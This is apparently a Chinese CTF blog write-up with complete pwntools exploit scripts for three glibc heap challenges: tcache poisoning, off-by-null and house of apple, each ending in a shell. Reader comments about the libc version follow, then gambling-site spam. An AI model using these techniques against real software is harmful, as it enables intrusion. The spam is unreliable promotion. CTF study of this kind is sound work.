不得不说,icq的比赛🍉就是多
Gift
2.31的UAF,没有edit功能
通过bargain还价修改fd,伪造一条tcache的链来做到任意地址分配
注意到还的价格可以为负数,这样就可以避免0x10的限制而是将fd指针指向自身chunk内
from pwn import*
# Connection to the challenge instance; the commented-out line is the
# local-binary variant the author switched between while debugging.
HOST, PORT = "123.56.45.214", 44298
r = remote(HOST, PORT)
# r = process('./pwn')
context(log_level="debug")
def new(size, content):
    """Menu option 2 (the author's "new"): send `size`, then raw `content` after one prompt line."""
    r.sendlineafter("your choice:\n", "2")
    r.sendlineafter("your choice:\n", str(size))
    r.recvline()
    r.send(content)
def delete(idx):
    """Menu option 3 (the author's "delete"): send `idx` after one prompt line."""
    r.sendlineafter("your choice:\n", "3")
    r.recvline()
    r.sendline(str(idx))
def show(idx):
    """Menu option 4 (the author's "show"): send `idx` after one prompt line."""
    r.sendlineafter("your choice:\n", "4")
    r.recvline()
    r.sendline(str(idx))
def gift(idx, size):
    """Menu option 5 (the author's "gift"/bargain): send `idx`, then `size`, each after one prompt line."""
    r.sendlineafter("your choice:\n", "5")
    for value in (idx, size):
        r.recvline()
        r.sendline(str(value))
# Interaction sequence for the "Gift" challenge as given by the author.
# Every allocation/free below depends on the exact heap layout produced by
# the previous steps — the order must not be changed.
new(1,"\n")
new(1,"\n")
delete(0)
delete(1)
show(1)
r.recvuntil("cost: ")
# Heap address is parsed from the decimal value printed after "cost: ";
# 0x260 is a binary-specific offset chosen by the author.
heap=int(r.recvline())-0x260
success("heap: "+hex(heap))
new(1,"\x00"*0x10+p64(heap+0x400)+"\x00"*0x68+p64(heap+0x410))
new(1,p64(heap+0x390))
delete(0)
delete(1)
# Negative value, as noted in the write-up text above.
gift(1,-0x10)
new(1,"\n")
new(1,"\n")
new(1,"\x00")
delete(0)
show(0)
r.recvuntil("cost: ")
# NOTE(review): 0x3ebca0, 0x3ed8d8 and 0x4f302 are constants relative to one
# specific libc build. A reader comment on this page reports the leak failing
# on glibc 2.31 and suggests the target used 2.27 — confirm against the
# challenge's libc before reusing these values.
libc_base=int(r.recvline())-0x3ebca0
success("libc_base: "+hex(libc_base))
new(1,p64(libc_base+0x3ed8d8))
new(1,"\n")
new(1,p64(libc_base+0x4f302))
delete(8)
#gdb.attach(r)
r.interactive()
smallcontainer
生硬的off by null,检测到\x11就置为\x00
还是2.27的libc,没有prev_size检测,常规方法造uaf即可
from pwn import*
# Connection to the challenge instance; the commented-out line is the
# local-binary variant used while debugging. `libc` is the challenge's
# libc, used below for symbol offsets.
HOST, PORT = "123.56.121.45", 23924
r = remote(HOST, PORT)
# r = process('./smallcontainer')
context(log_level="debug")
libc = ELF("./libc-2.27.so")
def new(size):
    """Menu option 1 (the author's "new"): send `size` at the ": " prompt."""
    r.sendlineafter("> ", "1")
    r.sendlineafter(": ", str(size))
def delete(idx):
    """Menu option 2 (the author's "delete"): send `idx` at the ": " prompt."""
    r.sendlineafter("> ", "2")
    r.sendlineafter(": ", str(idx))
def edit(idx, content):
    """Menu option 3 (the author's "edit"): send `idx` at the ": " prompt, then raw `content`."""
    r.sendlineafter("> ", "3")
    r.sendlineafter(": ", str(idx))
    r.send(content)
def show(idx):
    """Menu option 4 (the author's "show"): send `idx` at the ": " prompt."""
    r.sendlineafter("> ", "4")
    r.sendlineafter(": ", str(idx))
# Interaction sequence for the "smallcontainer" challenge as given by the
# author. Allocation sizes, counts and order are layout-dependent; keep them
# exactly as written.
for i in range(10): new(0x208)
for i in range(3,10): delete(i)
for i in range(7): new(0x1F8)
for i in range(3,10): delete(i)
delete(0)
# The overflowing writes described in the write-up text above (the binary
# rewrites a 0x11 byte to 0x00, per the author).
edit(2,"a"*0x1F8+p64(0x221))
edit(1,"a"*0x208)
edit(1,"a"*0x200+p64(0x420))
delete(2)
for i in range(7): new(0x208)
new(0x208)
show(1)
# libc base is parsed as hex from the output of show(1) up to the banner
# text; the 0x70 adjustment is the author's offset from __malloc_hook.
libc_base=int(r.recvuntil("This is a cyber container",drop=True),16)-libc.sym["__malloc_hook"]-0x70
success("libc_base: "+hex(libc_base))
new(0x108)
delete(9)
edit(1,p64(libc_base+libc.sym["__free_hook"]))
new(0x108)
new(0x108)
edit(10,p64(libc_base+libc.sym["system"]))
edit(0,"/bin/sh\n")
delete(0)
#gdb.attach(r)
r.interactive()
happy_note
2.34版本,一次UAF机会
常规泄漏之后,直接house of apple完事
from pwn import*
# Connection to the challenge instance; the commented-out line is the
# local-binary variant used while debugging. `libc` is the challenge's
# libc, used below for symbol offsets.
HOST, PORT = "182.92.74.66", 17827
r = remote(HOST, PORT)
# r = process('./happy_note')
context(log_level="debug")
libc = ELF("./libc.so.6")
def new(idx, size, mode):
    """Menu option 1 (the author's "new"): send `size`, then `idx`, then `mode`, each after one prompt line."""
    r.sendlineafter(">> ", "1")
    for value in (size, idx, mode):
        r.recvline()
        r.sendline(str(value))
def delete(idx):
    """Menu option 2 (the author's "delete"): send `idx` after one prompt line."""
    r.sendlineafter(">> ", "2")
    r.recvline()
    r.sendline(str(idx))
def show(idx):
    """Menu option 3 (the author's "show"): send `idx` after one prompt line."""
    r.sendlineafter(">> ", "3")
    r.recvline()
    r.sendline(str(idx))
def edit(idx, content):
    """Menu option 4 (the author's "edit"): send `idx` after one prompt line, then raw `content` after another."""
    r.sendlineafter(">> ", "4")
    r.recvline()
    r.sendline(str(idx))
    r.recvline()
    r.send(content)
def gift(idx):
    """Hidden menu option 666 (the author's "gift"): send `idx` after one prompt line."""
    r.sendlineafter(">> ", "666")
    r.recvline()
    r.sendline(str(idx))
def xor(ptr1, ptr2):
    """Return `ptr2` XORed with `ptr1 >> 12`.

    This is the pointer-mangling scheme recent glibc applies to tcache
    next-pointers (safe-linking): the stored value is the real pointer
    XORed with the storing chunk's address shifted right by 12.
    """
    mask = ptr1 >> 12
    return ptr2 ^ mask
# Interaction sequence for the "happy_note" challenge as given by the author.
# Allocation order, sizes and modes are layout-dependent; keep them as written.
for i in range(11): new(i,0x108,1)
for i in range(7): delete(i)
gift(7)
show(7)
r.recvuntil("content: ")
# libc base: 8-byte value read from the "content: " line; 0x219cc0 is a
# constant for the libc shipped with the challenge.
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x219cc0
success("libc_base: "+hex(libc_base))
_IO_wfile_jumps=libc_base+0x2160c0
new(0,0x100,1)
delete(9)
delete(7)
show(0)
r.recvuntil("content: ")
# Heap base from the same kind of leak; 0xc20 is the author's offset.
heap=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0xc20
success("heap: "+hex(heap))
new(2,0x100,1)
new(3,0xE8,1)
new(4,0xE8,1)
delete(4)
delete(3)
# The value written here is mangled with xor() because this libc protects
# tcache pointers (see the 2.34 note in the write-up text above).
edit(0,p64(xor(heap,libc_base+libc.sym["_IO_list_all"])))
new(5,0xE8,2)
new(6,0xE8,2)
new(7,0x200,1)
# Fake FILE structure for the technique named in the write-up text
# ("house of apple"); all offsets are specific to the libc above.
# NOTE(review): 0xeacef and 0x2160c0 are libc-build constants — confirm
# against the challenge's libc.so.6 before reuse.
fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x18,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(libc_base+0xeacef)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0xf30)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps)
fake_IO_struct=fake_IO_struct.ljust(0xd0,"\x00")
fake_IO_struct+=p64(heap+0xf30)
edit(7,fake_IO_struct)
edit(6,p64(heap+0xf30))
#gdb.attach(r,"b _IO_wdoallocbuf")
delete(9)
r.interactive()
师傅Gift那题libc泄露有问题吧
我用的是glibc2.31的,所以打不通,打扰了
Gift这题glibc应该是2.27的
Alright, 33wincom is worth giving a shot, folks. Nothing to lose! My thoughts for u is 33wincom
Feeling lucky? I gave lucky888game a shot and I wasn’t disappointed. Good bonuses and a solid range of games. Worth a look if you’re chasing that big win. Find your fortune at lucky888game
Hey guys, anyone catch the ‘đá gà c1 hôm nay’ matches? Was hoping for some good fights! Check it out here đá gà c1 hôm nay if you missed it.
Looking for 7m.cn.maccao? This page seems alright – worth a look if you’re after those specific details. Happy punting, mate! 7m.cn.maccao
Found some 888 bet offers on 881bet777. Gonna check them out and see if there’s anything juicy! Fingers crossed! Go check it out!: 888 bet
Gotta say, 88vin link is pretty slick. The loading times are fast, and the graphics are sharp. I’ll be spending my free time here now! 88vin link